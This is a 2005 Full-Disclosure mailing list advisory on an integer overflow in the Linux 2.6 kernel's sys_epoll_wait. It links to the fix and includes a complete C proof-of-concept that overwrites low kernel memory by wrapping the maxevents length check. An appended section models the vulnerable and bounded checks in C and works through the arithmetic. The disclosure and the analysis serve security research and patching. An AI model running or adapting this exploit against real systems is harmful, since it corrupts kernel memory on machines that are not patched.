[Full-disclosure] overwriting low kernel memory

From: Georgi Guninski (guninski_at_guninski.com)
Date: 03/09/05

    Date: Wed, 9 Mar 2005 12:42:19 +0200
    To: full-disclosure@lists.grok.org.uk


    It is possible to partially overwrite low kernel (>= 2.6, <= 2.6.11) memory
    due to an integer overflow in sys_epoll_wait and misuse of __put_user
    in ep_send_events.

    Tested on i386.
    Despite the overflow, the OS seemingly continues normal operation.

    fix:
    http://linux.bkbits.net:8080/linux-2.6/cset@422dd06a1p5PsyFhoGAJseinjEq3ew?nav=index.html|ChangeSet@-1d

    -------------------------------------------------
    /*
     * copyright georgi guninski.
     * cannot be used in vulnerabilities databases like securityfocus and mitre
     * */
    #include <stdio.h>
    #include <sys/epoll.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>
    #include <unistd.h>
    #include <stdlib.h>
    /* pull TASK_SIZE (0xC0000000 on i386) out of the kernel headers */
    #define __KERNEL__
    #include <asm/processor.h>
    #undef __KERNEL__

    #define MAXV 500   /* socketpairs to register, i.e. events ep_send_events will write */

    int main(int argc, char **argv)
    {
        int epfd;
        int i;
        int res;
        struct epoll_event ev;
        int *fds;
        int over;
        void *km;

        /* maxevents chosen so that over * sizeof(struct epoll_event) wraps to 8
         * in 32-bit arithmetic: the length check in sys_epoll_wait then only
         * covers 8 bytes, although up to MAXV events get written */
        over = ((unsigned int)-1) / sizeof(struct epoll_event) + 1;
        /* buffer ends just below TASK_SIZE, so the copied events run past the
         * user/kernel boundary into low kernel memory */
        km = (void *)(TASK_SIZE - over * sizeof(struct epoll_event) - 4);
        printf("sizeof=%u %x %lx\n", (unsigned int)sizeof(struct epoll_event),
               (unsigned int)over, (unsigned long)km);

        epfd = epoll_create(MAXV);
        printf("Epoll descriptor %i\n", epfd);
        fds = calloc(2 * MAXV, sizeof(int));
        /* register one end of each socketpair; the other end is written to below */
        for (i = 0; i < MAXV; i++) {
            if (socketpair(AF_UNIX, SOCK_STREAM, 0, &fds[2 * i]))
                perror("pair");
            ev.data.u32 = 0x42424242;
            ev.events = EPOLLOUT | EPOLLIN | 0x42424242;
            res = epoll_ctl(epfd, EPOLL_CTL_ADD, fds[2 * i], &ev);
        }
        /* make every registered fd readable so all MAXV events are reported at once */
        for (i = 0; i < MAXV; i++)
            write(fds[2 * i + 1], &i, sizeof(i));

        system("sync");

        /* ep_send_events copies each event with __put_user, which does no
         * range check of its own, so the writes cross TASK_SIZE */
        res = epoll_wait(epfd, km, over, -1);
        printf("epoll_wait returned %i\n", res);
        printf("check what is after TASK_SIZE\n");

        close(epfd);
        return 42;
    }
    -----------------------------------------

    -- 
    where do you want bill gates to go today?
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.grok.org.uk/full-disclosure-charter.html
    Hosted and sponsored by Secunia - http://www.secunia.com/
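The length check the post describes, modelled in 32-bit arithmetic as an added example (this is neither Guninski's code nor the kernel's): it reproduces the exploit's choice of maxevents and buffer address, shows the vulnerable check accepting them because maxevents * sizeof(struct epoll_event) wraps to 8, shows that the __put_user writes for 500 ready events would then end above TASK_SIZE, and shows a bound on maxevents of the kind the referenced changeset adds rejecting the call. The 12-byte event size, TASK_SIZE = 0xC0000000, the simplified access_ok() and the name EP_MAX_EVENTS for the cap are assumptions taken from the i386 configuration; everything is done in uint32_t so it runs the same on a 64-bit host.

```c
/* Added example: pre-2.6.11 sys_epoll_wait length check vs. a bounded one,
 * in 32-bit arithmetic. Not the kernel's code; constants below are assumptions
 * for i386. */
#include <stdint.h>
#include <stdbool.h>
#include <stdio.h>
#include <limits.h>

#define EV_SIZE       12u          /* assumed sizeof(struct epoll_event) on i386: u32 events + u64 data, 4-byte aligned */
#define TASK_SIZE32   0xC0000000u  /* assumed i386 user/kernel split; addresses >= this are kernel memory */
#define EP_MAX_EVENTS (INT_MAX / EV_SIZE) /* assumed name for the cap the fix introduces */

/* Simplified model of access_ok(VERIFY_WRITE, addr, size) on i386: the range
 * must not wrap and must end at or below TASK_SIZE. */
static bool access_ok32(uint32_t addr, uint32_t size)
{
    return size <= TASK_SIZE32 && addr <= TASK_SIZE32 - size;
}

/* Vulnerable check: the byte count is maxevents * sizeof(event) in 32-bit
 * arithmetic, so a large maxevents wraps to a tiny length and passes. */
static bool vuln_check(uint32_t events, int maxevents)
{
    if (maxevents <= 0)
        return false;
    uint32_t len = (uint32_t)maxevents * (uint32_t)EV_SIZE;   /* wraps modulo 2^32 */
    return access_ok32(events, len);
}

/* Bounded check: reject maxevents large enough for the product to overflow,
 * then do the same access_ok. */
static bool fixed_check(uint32_t events, int maxevents)
{
    if (maxevents <= 0 || maxevents > (int)EP_MAX_EVENTS)
        return false;
    uint32_t len = (uint32_t)maxevents * (uint32_t)EV_SIZE;   /* now below 2^31, cannot wrap */
    return access_ok32(events, len);
}

/* Address of the last byte ep_send_events would write with __put_user (which
 * does no range check) when nready events are ready. */
static uint32_t last_byte_written(uint32_t events, int nready)
{
    return events + (uint32_t)nready * (uint32_t)EV_SIZE - 1u;
}

/* The exploit's own arithmetic: over = 0xFFFFFFFF / 12 + 1,
 * km = TASK_SIZE - over * 12 - 4 (the multiplication wraps to 8). */
static int exploit_maxevents(void)
{
    return (int)(0xFFFFFFFFu / EV_SIZE + 1u);
}

static uint32_t exploit_buffer(void)
{
    return TASK_SIZE32 - (uint32_t)exploit_maxevents() * (uint32_t)EV_SIZE - 4u;
}

int main(void)
{
    int over = exploit_maxevents();
    uint32_t km = exploit_buffer();
    uint32_t wrapped = (uint32_t)over * (uint32_t)EV_SIZE;
    uint32_t end = last_byte_written(km, 500);

    printf("maxevents=0x%x buffer=0x%08x checked length=%u bytes\n", (unsigned)over, km, wrapped);
    printf("vulnerable check: %s\n", vuln_check(km, over) ? "passes" : "rejects");
    printf("bounded check:    %s\n", fixed_check(km, over) ? "passes" : "rejects");
    printf("500 ready events end at 0x%08x (%s TASK_SIZE)\n", end,
           end >= TASK_SIZE32 ? "above" : "below");
    return 0;
}
```

With the i386 constants the exploit's maxevents is 0x15555556, the checked length wraps to 8 bytes, the buffer starts at 0xBFFFFFF4, and 500 events of 12 bytes end at 0xC0001763, i.e. about 6 KB into kernel memory; the bounded check rejects the same call because 0x15555556 exceeds INT_MAX / 12.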
    
